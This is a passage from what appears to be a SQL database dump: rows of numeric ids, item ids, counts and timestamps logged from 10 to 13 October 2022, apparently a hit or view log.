06:37:21'),(61492,68,1,'2022-10-10','2022-10-10 06:37:23'),(61493,3087,1,'2022-10-10','2022-10-10 06:38:02'),(61494,1582,1,'2022-10-10','2022-10-10 06:55:18'),(61495,1544,1,'2022-10-10','2022-10-10 07:34:31'),(61496,3790,1,'2022-10-10','2022-10-10 08:08:02'),(61497,5062,1,'2022-10-10','2022-10-10 08:09:04'),(61498,3102,1,'2022-10-10','2022-10-10 08:15:06'),(61499,467,1,'2022-10-10','2022-10-10 09:19:59'),(61500,468,1,'2022-10-10','2022-10-10 09:21:06'),(61501,467,1,'2022-10-10','2022-10-10 09:21:22'),(61502,1544,1,'2022-10-10','2022-10-10 09:24:36'),(61503,467,1,'2022-10-10','2022-10-10 09:27:10'),(61504,72,1,'2022-10-10','2022-10-10 09:57:56'),(61505,467,1,'2022-10-10','2022-10-10 10:20:17'),(61506,2809,1,'2022-10-10','2022-10-10 10:50:02'),(61507,3030,1,'2022-10-10','2022-10-10 11:04:04'),(61508,467,1,'2022-10-10','2022-10-10 11:15:36'),(61509,3749,1,'2022-10-10','2022-10-10 11:47:32'),(61510,1594,1,'2022-10-10','2022-10-10 12:19:40'),(61511,4457,1,'2022-10-10','2022-10-10 12:23:16'),(61512,68,1,'2022-10-10','2022-10-10 12:23:50'),(61513,4457,1,'2022-10-10','2022-10-10 12:24:15'),(61514,1602,1,'2022-10-10','2022-10-10 12:25:23'),(61515,4840,1,'2022-10-10','2022-10-10 12:44:53'),(61516,4404,1,'2022-10-10','2022-10-10 12:46:28'),(61517,570,1,'2022-10-10','2022-10-10 12:57:45'),(61518,91,1,'2022-10-10','2022-10-10 13:02:05'),(61519,2809,1,'2022-10-10','2022-10-10 13:04:40'),(61520,72,1,'2022-10-10','2022-10-10 13:10:42'),(61521,4412,1,'2022-10-10','2022-10-10 13:18:47'),(61522,4668,1,'2022-10-10','2022-10-10 13:21:09'),(61523,2617,1,'2022-10-10','2022-10-10 13:27:02'),(61524,2704,1,'2022-10-10','2022-10-10 13:38:14'),(61525,3107,1,'2022-10-10','2022-10-10 13:45:43'),(61526,1602,1,'2022-10-10','2022-10-10 13:45:46'),(61527,1590,1,'2022-10-10','2022-10-10 14:16:27'),(61528,4837,1,'2022-10-10','2022-10-10 14:17:18'),(61529,4837,1,'2022-10-10','2022-10-10 14:17:18'),(61530,4837,1,'2022-10-10','2022-10-10 14:18:00'),(61531,74,1,'2022-10-10','2022-10-10 14:18:46'),(61532,4837,1,'2022-10-10','2022-10-10 14:19:11'),(61533,3030,1,'2022-10-10','2022-10-10 14:24:27'),(61534,1870,1,'2022-10-10','2022-10-10 14:24:37'),(61535,1590,1,'2022-10-10','2022-10-10 14:25:41'),(61536,2411,1,'2022-10-10','2022-10-10 14:27:05'),(61537,87,1,'2022-10-10','2022-10-10 14:34:32'),(61538,3124,1,'2022-10-10','2022-10-10 14:57:01'),(61539,1596,1,'2022-10-10','2022-10-10 15:00:04'),(61540,1544,1,'2022-10-10','2022-10-10 15:19:33'),(61541,1604,1,'2022-10-10','2022-10-10 15:22:56'),(61542,87,1,'2022-10-10','2022-10-10 15:23:44'),(61543,480,1,'2022-10-10','2022-10-10 15:24:35'),(61544,4424,1,'2022-10-10','2022-10-10 15:26:56'),(61545,4424,1,'2022-10-10','2022-10-10 15:26:58'),(61546,2617,1,'2022-10-10','2022-10-10 15:41:58'),(61547,1596,1,'2022-10-10','2022-10-10 15:57:00'),(61548,1718,1,'2022-10-10','2022-10-10 16:25:30'),(61549,3107,1,'2022-10-10','2022-10-10 16:26:58'),(61550,1544,1,'2022-10-10','2022-10-10 16:30:03'),(61551,3107,1,'2022-10-10','2022-10-10 16:56:57'),(61552,3261,1,'2022-10-10','2022-10-10 17:16:28'),(61553,467,1,'2022-10-10','2022-10-10 18:00:02'),(61554,480,1,'2022-10-10','2022-10-10 18:03:11'),(61555,1594,1,'2022-10-10','2022-10-10 18:15:38'),(61556,1594,1,'2022-10-10','2022-10-10 18:15:40'),(61557,1877,1,'2022-10-10','2022-10-10 19:05:45'),(61558,3706,1,'2022-10-10','2022-10-10 19:16:19'),(61559,4660,1,'2022-10-10','2022-10-10 19:21:53'),(61560,4648,1,'2022-10-10','2022-10-10 19:24:07'),(61561,4387,1,'2022-10-10','2022-10-10 19:26:28'),(61562,4660,1,'2022-10-10','2022-10-10 19:31:04'),(61563,3287,1,'2022-10-10','2022-10-10 19:34:59'),(61564,4582,1,'2022-10-10','2022-10-10 19:38:32'),(61565,1872,1,'2022-10-10','2022-10-10 19:40:16'),(61566,76,1,'2022-10-10','2022-10-10 19:42:14'),(61567,3287,1,'2022-10-10','2022-10-10 19:42:30'),(61568,1582,1,'2022-10-10','2022-10-10 19:42:41'),(61569,4963,1,'2022-10-10','2022-10-10 19:44:53'),(61570,4582,1,'2022-10-10','2022-10-10 19:58:53'),(61571,3664,1,'2022-10-10','2022-10-10 20:00:46'),(61572,1872,1,'2022-10-10','2022-10-10 20:01:14'),(61573,4657,1,'2022-10-10','2022-10-10 20:03:27'),(61574,4645,1,'2022-10-10','2022-10-10 20:07:57'),(61575,3287,1,'2022-10-10','2022-10-10 20:08:16'),(61576,1877,1,'2022-10-10','2022-10-10 20:10:24'),(61577,4663,1,'2022-10-10','2022-10-10 20:13:23'),(61578,4648,1,'2022-10-10','2022-10-10 20:15:55'),(61579,4651,1,'2022-10-10','2022-10-10 20:26:32'),(61580,470,1,'2022-10-10','2022-10-10 20:28:44'),(61581,4645,1,'2022-10-10','2022-10-10 20:33:29'),(61582,72,1,'2022-10-10','2022-10-10 20:35:40'),(61583,2993,1,'2022-10-10','2022-10-10 22:46:36'),(61584,1598,1,'2022-10-10','2022-10-10 22:55:43'),(61585,4845,1,'2022-10-10','2022-10-10 23:20:47'),(61586,4845,1,'2022-10-10','2022-10-10 23:22:04'),(61587,2658,1,'2022-10-10','2022-10-10 23:29:39'),(61588,2658,1,'2022-10-10','2022-10-10 23:41:36'),(61589,2658,1,'2022-10-10','2022-10-10 23:43:18'),(61590,1751,1,'2022-10-10','2022-10-10 23:44:06'),(61591,1751,1,'2022-10-10','2022-10-10 23:44:44'),(61592,1751,1,'2022-10-10','2022-10-10 23:45:12'),(61593,2658,1,'2022-10-10','2022-10-10 23:45:28'),(61594,80,1,'2022-10-11','2022-10-11 00:05:59'),(61595,1544,1,'2022-10-11','2022-10-11 00:07:17'),(61596,4938,1,'2022-10-11','2022-10-11 01:29:05'),(61597,3706,1,'2022-10-11','2022-10-11 01:29:40'),(61598,1544,1,'2022-10-11','2022-10-11 01:32:48'),(61599,1582,1,'2022-10-11','2022-10-11 01:37:48'),(61600,80,1,'2022-10-11','2022-10-11 02:10:23'),(61601,4703,1,'2022-10-11','2022-10-11 03:16:00'),(61602,4323,1,'2022-10-11','2022-10-11 03:16:01'),(61603,1544,1,'2022-10-11','2022-10-11 03:30:07'),(61604,1544,1,'2022-10-11','2022-10-11 03:31:52'),(61605,2165,1,'2022-10-11','2022-10-11 04:08:42'),(61606,72,1,'2022-10-11','2022-10-11 04:34:21'),(61607,1602,1,'2022-10-11','2022-10-11 05:05:34'),(61608,570,1,'2022-10-11','2022-10-11 05:35:58'),(61609,470,1,'2022-10-11','2022-10-11 05:44:45'),(61610,1608,1,'2022-10-11','2022-10-11 05:53:00'),(61611,4966,1,'2022-10-11','2022-10-11 05:56:19'),(61612,2609,1,'2022-10-11','2022-10-11 06:01:20'),(61613,2457,1,'2022-10-11','2022-10-11 06:05:05'),(61614,4566,1,'2022-10-11','2022-10-11 06:17:04'),(61615,4612,1,'2022-10-11','2022-10-11 06:20:12'),(61616,4612,1,'2022-10-11','2022-10-11 06:20:13'),(61617,4412,1,'2022-10-11','2022-10-11 06:27:45'),(61618,3079,1,'2022-10-11','2022-10-11 06:35:22'),(61619,2617,1,'2022-10-11','2022-10-11 06:42:57'),(61620,1582,1,'2022-10-11','2022-10-11 06:46:57'),(61621,3226,1,'2022-10-11','2022-10-11 06:50:35'),(61622,3226,1,'2022-10-11','2022-10-11 06:50:37'),(61623,1582,1,'2022-10-11','2022-10-11 06:54:41'),(61624,3316,1,'2022-10-11','2022-10-11 06:58:10'),(61625,3069,1,'2022-10-11','2022-10-11 07:01:59'),(61626,1614,1,'2022-10-11','2022-10-11 07:05:58'),(61627,1544,1,'2022-10-11','2022-10-11 07:12:58'),(61628,3030,1,'2022-10-11','2022-10-11 07:13:28'),(61629,1718,1,'2022-10-11','2022-10-11 07:24:00'),(61630,4416,1,'2022-10-11','2022-10-11 07:24:18'),(61631,2503,1,'2022-10-11','2022-10-11 07:33:02'),(61632,2503,1,'2022-10-11','2022-10-11 07:33:33'),(61633,470,1,'2022-10-11','2022-10-11 07:50:47'),(61634,4719,1,'2022-10-11','2022-10-11 08:09:07'),(61635,2410,1,'2022-10-11','2022-10-11 08:17:48'),(61636,4551,1,'2022-10-11','2022-10-11 08:33:17'),(61637,1766,1,'2022-10-11','2022-10-11 08:36:33'),(61638,4618,1,'2022-10-11','2022-10-11 08:44:49'),(61639,1608,1,'2022-10-11','2022-10-11 08:53:04'),(61640,2617,1,'2022-10-11','2022-10-11 09:03:02'),(61641,1592,1,'2022-10-11','2022-10-11 09:05:18'),(61642,468,1,'2022-10-11','2022-10-11 09:12:52'),(61643,4637,1,'2022-10-11','2022-10-11 09:22:47'),(61644,1544,1,'2022-10-11','2022-10-11 09:39:50'),(61645,1596,1,'2022-10-11','2022-10-11 09:43:02'),(61646,1602,1,'2022-10-11','2022-10-11 09:52:47'),(61647,4448,1,'2022-10-11','2022-10-11 10:13:12'),(61648,1877,1,'2022-10-11','2022-10-11 10:14:19'),(61649,1544,1,'2022-10-11','2022-10-11 10:27:12'),(61650,3096,1,'2022-10-11','2022-10-11 10:32:50'),(61651,3096,1,'2022-10-11','2022-10-11 10:32:52'),(61652,1610,1,'2022-10-11','2022-10-11 10:34:09'),(61653,1588,1,'2022-10-11','2022-10-11 10:34:12'),(61654,4424,1,'2022-10-11','2022-10-11 10:36:36'),(61655,4424,1,'2022-10-11','2022-10-11 10:36:48'),(61656,5125,1,'2022-10-11','2022-10-11 10:43:34'),(61657,484,1,'2022-10-11','2022-10-11 10:52:47'),(61658,1588,1,'2022-10-11','2022-10-11 11:08:35'),(61659,486,1,'2022-10-11','2022-10-11 11:27:17'),(61660,486,1,'2022-10-11','2022-10-11 11:28:06'),(61661,4703,1,'2022-10-11','2022-10-11 11:31:36'),(61662,1588,1,'2022-10-11','2022-10-11 11:36:51'),(61663,1582,1,'2022-10-11','2022-10-11 11:39:10'),(61664,1722,1,'2022-10-11','2022-10-11 11:41:01'),(61665,477,1,'2022-10-11','2022-10-11 12:16:09'),(61666,1602,1,'2022-10-11','2022-10-11 12:18:09'),(61667,1602,1,'2022-10-11','2022-10-11 12:18:18'),(61668,2904,1,'2022-10-11','2022-10-11 12:18:46'),(61669,102,1,'2022-10-11','2022-10-11 12:21:31'),(61670,3764,1,'2022-10-11','2022-10-11 12:31:37'),(61671,72,1,'2022-10-11','2022-10-11 12:34:13'),(61672,1602,1,'2022-10-11','2022-10-11 13:31:57'),(61673,4960,1,'2022-10-11','2022-10-11 13:36:17'),(61674,4966,1,'2022-10-11','2022-10-11 13:42:05'),(61675,4966,1,'2022-10-11','2022-10-11 13:43:08'),(61676,4966,1,'2022-10-11','2022-10-11 13:50:01'),(61677,3479,1,'2022-10-11','2022-10-11 13:59:30'),(61678,3102,1,'2022-10-11','2022-10-11 14:02:58'),(61679,3079,1,'2022-10-11','2022-10-11 14:13:03'),(61680,4657,1,'2022-10-11','2022-10-11 14:14:58'),(61681,4416,1,'2022-10-11','2022-10-11 14:36:51'),(61682,2769,1,'2022-10-11','2022-10-11 14:40:00'),(61683,3124,1,'2022-10-11','2022-10-11 14:41:52'),(61684,5125,1,'2022-10-11','2022-10-11 14:53:48'),(61685,4663,1,'2022-10-11','2022-10-11 14:55:23'),(61686,4408,1,'2022-10-11','2022-10-11 15:04:41'),(61687,1608,1,'2022-10-11','2022-10-11 15:05:14'),(61688,3790,1,'2022-10-11','2022-10-11 15:08:48'),(61689,5042,1,'2022-10-11','2022-10-11 15:10:57'),(61690,4642,1,'2022-10-11','2022-10-11 15:13:33'),(61691,2617,1,'2022-10-11','2022-10-11 15:29:27'),(61692,84,1,'2022-10-11','2022-10-11 15:31:17'),(61693,472,1,'2022-10-11','2022-10-11 15:31:21'),(61694,3694,1,'2022-10-11','2022-10-11 15:32:29'),(61695,84,1,'2022-10-11','2022-10-11 15:33:34'),(61696,3691,1,'2022-10-11','2022-10-11 15:33:41'),(61697,84,1,'2022-10-11','2022-10-11 15:34:46'),(61698,3664,1,'2022-10-11','2022-10-11 15:34:55'),(61699,84,1,'2022-10-11','2022-10-11 15:36:48'),(61700,1877,1,'2022-10-11','2022-10-11 15:37:13'),(61701,72,1,'2022-10-11','2022-10-11 15:38:10'),(61702,1877,1,'2022-10-11','2022-10-11 15:40:31'),(61703,108,1,'2022-10-11','2022-10-11 15:40:53'),(61704,1877,1,'2022-10-11','2022-10-11 15:45:04'),(61705,3226,1,'2022-10-11','2022-10-11 15:49:20'),(61706,3226,1,'2022-10-11','2022-10-11 15:49:23'),(61707,1726,1,'2022-10-11','2022-10-11 15:50:45'),(61708,4428,1,'2022-10-11','2022-10-11 15:53:05'),(61709,1872,1,'2022-10-11','2022-10-11 16:07:17'),(61710,72,1,'2022-10-11','2022-10-11 16:26:05'),(61711,3060,1,'2022-10-11','2022-10-11 16:26:29'),(61712,1718,1,'2022-10-11','2022-10-11 16:54:45'),(61713,1718,1,'2022-10-11','2022-10-11 16:56:46'),(61714,3790,1,'2022-10-11','2022-10-11 17:08:22'),(61715,1711,1,'2022-10-11','2022-10-11 17:19:19'),(61716,72,1,'2022-10-11','2022-10-11 17:37:18'),(61717,3287,1,'2022-10-11','2022-10-11 17:58:00'),(61718,2410,1,'2022-10-11','2022-10-11 18:02:01'),(61719,471,1,'2022-10-11','2022-10-11 18:14:03'),(61720,2609,1,'2022-10-11','2022-10-11 18:20:28'),(61721,74,1,'2022-10-11','2022-10-11 18:43:05'),(61722,2503,1,'2022-10-11','2022-10-11 18:43:35'),(61723,2904,1,'2022-10-11','2022-10-11 18:43:53'),(61724,102,1,'2022-10-11','2022-10-11 18:44:28'),(61725,3030,1,'2022-10-11','2022-10-11 18:53:21'),(61726,3710,1,'2022-10-11','2022-10-11 19:24:17'),(61727,1707,1,'2022-10-11','2022-10-11 19:25:44'),(61728,80,1,'2022-10-11','2022-10-11 19:46:14'),(61729,5033,1,'2022-10-11','2022-10-11 19:57:44'),(61730,5033,1,'2022-10-11','2022-10-11 19:57:49'),(61731,3005,1,'2022-10-11','2022-10-11 20:10:15'),(61732,1544,1,'2022-10-11','2022-10-11 20:25:08'),(61733,1544,1,'2022-10-11','2022-10-11 20:25:11'),(61734,5024,1,'2022-10-11','2022-10-11 20:32:42'),(61735,91,1,'2022-10-11','2022-10-11 20:35:49'),(61736,1606,1,'2022-10-11','2022-10-11 20:52:56'),(61737,4874,1,'2022-10-11','2022-10-11 21:05:03'),(61738,4408,1,'2022-10-11','2022-10-11 21:34:55'),(61739,1544,1,'2022-10-11','2022-10-11 22:17:49'),(61740,5062,1,'2022-10-11','2022-10-11 22:18:29'),(61741,68,1,'2022-10-11','2022-10-11 22:23:51'),(61742,68,1,'2022-10-11','2022-10-11 22:23:51'),(61743,1544,1,'2022-10-11','2022-10-11 22:25:19'),(61744,1544,1,'2022-10-11','2022-10-11 22:25:22'),(61745,1544,1,'2022-10-11','2022-10-11 22:25:25'),(61746,1544,1,'2022-10-11','2022-10-11 22:25:35'),(61747,3030,1,'2022-10-11','2022-10-11 23:21:52'),(61748,3030,1,'2022-10-11','2022-10-11 23:22:59'),(61749,74,1,'2022-10-11','2022-10-11 23:53:34'),(61750,72,1,'2022-10-12','2022-10-12 00:14:33'),(61751,72,1,'2022-10-12','2022-10-12 00:21:55'),(61752,3030,1,'2022-10-12','2022-10-12 00:39:13'),(61753,1544,1,'2022-10-12','2022-10-12 00:39:17'),(61754,3030,1,'2022-10-12','2022-10-12 00:39:17'),(61755,1608,1,'2022-10-12','2022-10-12 01:08:43'),(61756,3721,1,'2022-10-12','2022-10-12 01:18:24'),(61757,2769,1,'2022-10-12','2022-10-12 01:26:41'),(61758,1610,1,'2022-10-12','2022-10-12 01:30:34'),(61759,1610,1,'2022-10-12','2022-10-12 01:31:10'),(61760,1608,1,'2022-10-12','2022-10-12 01:52:55'),(61761,4941,1,'2022-10-12','2022-10-12 02:03:31'),(61762,3069,1,'2022-10-12','2022-10-12 02:38:56'),(61763,1596,1,'2022-10-12','2022-10-12 03:06:43'),(61764,1598,1,'2022-10-12','2022-10-12 03:57:21'),(61765,3287,1,'2022-10-12','2022-10-12 04:29:39'),(61766,4700,1,'2022-10-12','2022-10-12 05:00:49'),(61767,3030,1,'2022-10-12','2022-10-12 05:44:21'),(61768,2411,1,'2022-10-12','2022-10-12 05:45:43'),(61769,3030,1,'2022-10-12','2022-10-12 05:45:50'),(61770,1610,1,'2022-10-12','2022-10-12 05:51:49'),(61771,1726,1,'2022-10-12','2022-10-12 05:52:04'),(61772,1726,1,'2022-10-12','2022-10-12 05:52:23'),(61773,1726,1,'2022-10-12','2022-10-12 05:52:29'),(61774,1726,1,'2022-10-12','2022-10-12 05:52:39'),(61775,1726,1,'2022-10-12','2022-10-12 05:52:45'),(61776,4546,1,'2022-10-12','2022-10-12 06:17:59'),(61777,4700,1,'2022-10-12','2022-10-12 06:30:45'),(61778,4424,1,'2022-10-12','2022-10-12 06:35:47'),(61779,4424,1,'2022-10-12','2022-10-12 06:35:48'),(61780,3030,1,'2022-10-12','2022-10-12 06:36:52'),(61781,1544,1,'2022-10-12','2022-10-12 06:39:21'),(61782,3691,1,'2022-10-12','2022-10-12 06:57:13'),(61783,3247,1,'2022-10-12','2022-10-12 07:21:51'),(61784,5024,1,'2022-10-12','2022-10-12 07:40:46'),(61785,3107,1,'2022-10-12','2022-10-12 07:41:46'),(61786,3482,1,'2022-10-12','2022-10-12 07:57:54'),(61787,1544,1,'2022-10-12','2022-10-12 08:08:24'),(61788,3030,1,'2022-10-12','2022-10-12 09:01:41'),(61789,2658,1,'2022-10-12','2022-10-12 10:03:23'),(61790,1596,1,'2022-10-12','2022-10-12 10:15:55'),(61791,1544,1,'2022-10-12','2022-10-12 10:35:13'),(61792,1582,1,'2022-10-12','2022-10-12 11:07:03'),(61793,91,1,'2022-10-12','2022-10-12 11:07:23'),(61794,87,1,'2022-10-12','2022-10-12 11:08:19'),(61795,89,1,'2022-10-12','2022-10-12 11:09:01'),(61796,1608,1,'2022-10-12','2022-10-12 11:13:50'),(61797,4420,1,'2022-10-12','2022-10-12 11:21:13'),(61798,3107,1,'2022-10-12','2022-10-12 11:21:37'),(61799,3107,1,'2022-10-12','2022-10-12 11:21:38'),(61800,1544,1,'2022-10-12','2022-10-12 11:31:04'),(61801,4428,1,'2022-10-12','2022-10-12 11:59:14'),(61802,1544,1,'2022-10-12','2022-10-12 12:02:38'),(61803,2419,1,'2022-10-12','2022-10-12 12:04:52'),(61804,72,1,'2022-10-12','2022-10-12 12:20:38'),(61805,1608,1,'2022-10-12','2022-10-12 12:44:01'),(61806,3030,1,'2022-10-12','2022-10-12 12:50:19'),(61807,1612,1,'2022-10-12','2022-10-12 12:52:42'),(61808,3030,1,'2022-10-12','2022-10-12 12:54:14'),(61809,1588,1,'2022-10-12','2022-10-12 13:01:36'),(61810,3104,1,'2022-10-12','2022-10-12 13:04:39'),(61811,68,1,'2022-10-12','2022-10-12 13:07:25'),(61812,1586,1,'2022-10-12','2022-10-12 13:11:26'),(61813,74,1,'2022-10-12','2022-10-12 13:13:21'),(61814,1586,1,'2022-10-12','2022-10-12 13:14:00'),(61815,2152,1,'2022-10-12','2022-10-12 13:17:49'),(61816,2152,1,'2022-10-12','2022-10-12 13:18:01'),(61817,2152,1,'2022-10-12','2022-10-12 13:18:18'),(61818,3030,1,'2022-10-12','2022-10-12 13:18:53'),(61819,4608,1,'2022-10-12','2022-10-12 13:22:09'),(61820,2152,1,'2022-10-12','2022-10-12 13:26:37'),(61821,4911,1,'2022-10-12','2022-10-12 13:27:01'),(61822,2152,1,'2022-10-12','2022-10-12 13:27:01'),(61823,2152,1,'2022-10-12','2022-10-12 13:29:56'),(61824,5109,1,'2022-10-12','2022-10-12 13:30:56'),(61825,2152,1,'2022-10-12','2022-10-12 13:32:55'),(61826,68,1,'2022-10-12','2022-10-12 13:38:26'),(61827,5062,1,'2022-10-12','2022-10-12 14:01:58'),(61828,5062,1,'2022-10-12','2022-10-12 14:14:11'),(61829,1872,1,'2022-10-12','2022-10-12 14:29:19'),(61830,1870,1,'2022-10-12','2022-10-12 14:43:46'),(61831,1596,1,'2022-10-12','2022-10-12 15:08:54'),(61832,3704,1,'2022-10-12','2022-10-12 15:08:56'),(61833,3704,1,'2022-10-12','2022-10-12 15:08:58'),(61834,1544,1,'2022-10-12','2022-10-12 15:14:30'),(61835,3764,1,'2022-10-12','2022-10-12 15:19:35'),(61836,1600,1,'2022-10-12','2022-10-12 15:33:51'),(61837,2178,1,'2022-10-12','2022-10-12 15:41:15'),(61838,68,1,'2022-10-12','2022-10-12 15:46:23'),(61839,488,1,'2022-10-12','2022-10-12 15:53:55'),(61840,89,1,'2022-10-12','2022-10-12 15:59:17'),(61841,89,1,'2022-10-12','2022-10-12 16:00:07'),(61842,89,1,'2022-10-12','2022-10-12 16:03:42'),(61843,89,1,'2022-10-12','2022-10-12 16:03:43'),(61844,89,1,'2022-10-12','2022-10-12 16:04:26'),(61845,68,1,'2022-10-12','2022-10-12 16:05:03'),(61846,89,1,'2022-10-12','2022-10-12 16:05:08'),(61847,89,1,'2022-10-12','2022-10-12 16:05:45'),(61848,89,1,'2022-10-12','2022-10-12 16:06:00'),(61849,89,1,'2022-10-12','2022-10-12 16:06:28'),(61850,5033,1,'2022-10-12','2022-10-12 16:06:58'),(61851,5033,1,'2022-10-12','2022-10-12 16:09:46'),(61852,1598,1,'2022-10-12','2022-10-12 16:12:37'),(61853,1596,1,'2022-10-12','2022-10-12 16:16:24'),(61854,5033,1,'2022-10-12','2022-10-12 16:16:42'),(61855,89,1,'2022-10-12','2022-10-12 16:18:45'),(61856,89,1,'2022-10-12','2022-10-12 16:19:42'),(61857,89,1,'2022-10-12','2022-10-12 16:19:56'),(61858,89,1,'2022-10-12','2022-10-12 16:19:59'),(61859,89,1,'2022-10-12','2022-10-12 16:20:49'),(61860,89,1,'2022-10-12','2022-10-12 16:21:40'),(61861,2457,1,'2022-10-12','2022-10-12 16:22:04'),(61862,89,1,'2022-10-12','2022-10-12 16:23:40'),(61863,2769,1,'2022-10-12','2022-10-12 16:23:51'),(61864,89,1,'2022-10-12','2022-10-12 16:24:09'),(61865,89,1,'2022-10-12','2022-10-12 16:24:55'),(61866,5163,1,'2022-10-12','2022-10-12 16:25:18'),(61867,89,1,'2022-10-12','2022-10-12 16:26:54'),(61868,89,1,'2022-10-12','2022-10-12 16:26:56'),(61869,89,1,'2022-10-12','2022-10-12 16:27:23'),(61870,89,1,'2022-10-12','2022-10-12 16:30:56'),(61871,89,1,'2022-10-12','2022-10-12 16:30:59'),(61872,89,1,'2022-10-12','2022-10-12 16:31:17'),(61873,3027,1,'2022-10-12','2022-10-12 16:59:19'),(61874,80,1,'2022-10-12','2022-10-12 17:27:09'),(61875,3027,1,'2022-10-12','2022-10-12 17:29:46'),(61876,3060,1,'2022-10-12','2022-10-12 18:21:15'),(61877,4436,1,'2022-10-12','2022-10-12 18:22:11'),(61878,5028,1,'2022-10-12','2022-10-12 18:37:40'),(61879,3285,1,'2022-10-12','2022-10-12 18:46:32'),(61880,2503,1,'2022-10-12','2022-10-12 19:07:36'),(61881,4323,1,'2022-10-12','2022-10-12 19:28:17'),(61882,4436,1,'2022-10-12','2022-10-12 19:30:31'),(61883,5146,1,'2022-10-12','2022-10-12 19:32:32'),(61884,72,1,'2022-10-12','2022-10-12 20:19:24'),(61885,5146,1,'2022-10-12','2022-10-12 20:42:04'),(61886,2658,1,'2022-10-12','2022-10-12 21:07:39'),(61887,2769,1,'2022-10-12','2022-10-12 21:09:10'),(61888,1608,1,'2022-10-12','2022-10-12 21:33:00'),(61889,4498,1,'2022-10-12','2022-10-12 21:34:40'),(61890,4498,1,'2022-10-12','2022-10-12 21:38:48'),(61891,1544,1,'2022-10-12','2022-10-12 21:43:15'),(61892,4498,1,'2022-10-12','2022-10-12 21:51:20'),(61893,3267,1,'2022-10-12','2022-10-12 22:04:10'),(61894,4622,1,'2022-10-12','2022-10-12 22:15:03'),(61895,3030,1,'2022-10-12','2022-10-12 22:29:51'),(61896,3249,1,'2022-10-12','2022-10-12 22:31:52'),(61897,2159,1,'2022-10-12','2022-10-12 23:19:30'),(61898,2159,1,'2022-10-12','2022-10-12 23:19:31'),(61899,2159,1,'2022-10-12','2022-10-12 23:19:56'),(61900,3498,1,'2022-10-12','2022-10-12 23:24:10'),(61901,1722,1,'2022-10-12','2022-10-12 23:28:38'),(61902,3764,1,'2022-10-12','2022-10-12 23:29:24'),(61903,1722,1,'2022-10-12','2022-10-12 23:29:28'),(61904,1722,1,'2022-10-12','2022-10-12 23:29:54'),(61905,3704,1,'2022-10-12','2022-10-12 23:32:40'),(61906,3704,1,'2022-10-12','2022-10-12 23:33:30'),(61907,2658,1,'2022-10-13','2022-10-13 00:46:50'),(61908,4391,1,'2022-10-13','2022-10-13 01:32:44'),(61909,87,1,'2022-10-13','2022-10-13 02:12:02'),(61910,1544,1,'2022-10-13','2022-10-13 02:16:44'),(61911,2911,1,'2022-10-13','2022-10-13 02:34:51'),(61912,2309,1,'2022-10-13','2022-10-13 03:48:57'),(61913,72,1,'2022-10-13','2022-10-13 04:18:00'),(61914,1544,1,'2022-10-13','2022-10-13 05:13:15'),(61915,2658,1,'2022-10-13','2022-10-13 05:46:46'),(61916,2658,1,'2022-10-13','2022-10-13 05:51:22'),(61917,2911,1,'2022-10-13','2022-10-13 05:58:27'),(61918,1544,1,'2022-10-13','2022-10-13 06:36:57'),(61919,2159,1,'2022-10-13','2022-10-13 08:03:10'),(61920,4776,1,'2022-10-13','2022-10-13 08:06:59'),(61921,472,1,'2022-10-13','2022-10-13 08:31:37'),(61922,3030,1,'2022-10-13','2022-10-13 09:01:53'),(61923,74,1,'2022-10-13','2022-10-13 09:04:59'),(61924,2503,1,'2022-10-13','2022-10-13 09:05:47'),(61925,1602,1,'2022-10-13','2022-10-13 09:08:53'),(61926,1602,1,'2022-10-13','2022-10-13 09:11:26'),(61927,89,1,'2022-10-13','2022-10-13 09:15:47'),(61928,89,1,'2022-10-13','2022-10-13 09:16:17'),(61929,89,1,'2022-10-13','2022-10-13 09:16:44'),(61930,5163,1,'2022-10-13','2022-10-13 09:16:56'),(61931,1614,1,'2022-10-13','2022-10-13 09:27:07'),(61932,1544,1,'2022-10-13','2022-10-13 09:50:29'),(61933,1544,1,'2022-10-13','2022-10-13 09:50:30'),(61934,1544,1,'2022-10-13','2022-10-13 10:24:27'),(61935,1602,1,'2022-10-13','2022-10-13 10:25:57'),(61936,1544,1,'2022-10-13','2022-10-13 10:39:41'),(61937,3107,1,'2022-10-13','2022-10-13 11:07:05'),(61938,3498,1,'2022-10-13','2022-10-13 11:56:32'),(61939,72,1,'2022-10-13','2022-10-13 12:20:25'),(61940,91,1,'2022-10-13','2022-10-13 12:27:36'),(61941,68,1,'2022-10-13','2022-10-13 12:28:47'),(61942,91,1,'2022-10-13','2022-10-13 12:29:02'),(61943,1870,1,'2022-10-13','2022-10-13 12:49:14'),(61944,89,1,'2022-10-13','2022-10-13 12:50:58'),(61945,1582,1,'2022-10-13','2022-10-13 12:51:10'),(61946,3102,1,'2022-10-13','2022-10-13 12:55:53'),(61947,1584,1,'2022-10-13','2022-10-13 13:03:23'),(61948,1584,1,'2022-10-13','2022-10-13 13:06:00'),(61949,4551,1,'2022-10-13','2022-10-13 13:08:41'),(61950,4988,1,'2022-10-13','2022-10-13 13:13:00'),(61951,3030,1,'2022-10-13','2022-10-13 13:23:58'),(61952,3030,1,'2022-10-13','2022-10-13 13:24:10'),(61953,2395,1,'2022-10-13','2022-10-13 13:31:21'),(61954,2911,1,'2022-10-13','2022-10-13 13:39:05'),(61955,4404,1,'2022-10-13','2022-10-13 13:50:06'),(61956,3107,1,'2022-10-13','2022-10-13 13:53:42'),(61957,1588,1,'2022-10-13','2022-10-13 13:57:21'),(61958,3742,1,'2022-10-13','2022-10-13 14:46:39'),(61959,2309,1,'2022-10-13','2022-10-13 14:46:39'),(61960,4556,1,'2022-10-13','2022-10-13 15:04:01'),(61961,5076,1,'2022-10-13','2022-10-13 15:07:17'),(61962,1870,1,'2022-10-13','2022-10-13 15:18:08'),(61963,1870,1,'2022-10-13','2022-10-13 15:28:05'),(61964,1544,1,'2022-10-13','2022-10-13 15:39:08'),(61965,1544,1,'2022-10-13','2022-10-13 15:39:15'),(61966,80,1,'2022-10-13','2022-10-13 16:28:37'),(61967,1606,1,'2022-10-13','2022-10-13 17:27:37'),(61968,1606,1,'2022-10-13','2022-10-13 17:27:39'),(61969,1602,1,'2022-10-13','2022-10-13 19:03:48'),(61970,1602,1,'2022-10-13','2022-10-13 19:06:06'),(61971,3030,1,'2022-10-13','2022-10-13 19:10:31'),(61972,1582,1,'2022-10-13','2022-10-13 19:13:13'),(61973,1582,1,'2022-10-13','2022-10-13 19:48:23'),(61974,74,1,'2022-10-13','2022-10-13 21:08:14'),(61975,3691,1,'2022-10-13','2022-10-13 21:40:52'),(61976,72,1,'2022-10-13','2022-10-13 21:53:24'),(61977,1588,1,'2022-10-13','2022-10-13 21:58:47'),(61978,80,1,'2022-10-13','2022-10-13 